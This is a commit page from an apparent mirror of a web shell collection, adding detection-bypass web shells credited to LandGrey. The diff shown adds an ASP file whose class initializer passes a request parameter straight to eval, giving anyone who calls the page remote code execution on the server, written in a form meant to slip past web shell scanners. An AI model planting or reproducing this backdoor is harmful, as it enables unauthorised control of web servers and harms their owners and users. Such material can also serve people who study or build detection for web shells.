1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-10 09:49:07 +00:00

webshell-detect-bypass

from: https://github.com/LandGrey/webshell-detect-bypass/tree/master/webshell/asp
author: Build By LandGrey
This commit is contained in:
Levi Li
2018-12-20 11:41:24 +08:00
committed by GitHub
parent 32be5d26bf
commit 7451dc532b
9 changed files with 333 additions and 0 deletions

9
asp/class-initialize.asp Normal file
View File

@@ -0,0 +1,9 @@
<%
Class LandGrey
Private Sub Class_Initialize
eval (request("LandGrey"))
End Sub
End Class
Set X = New LandGrey
%>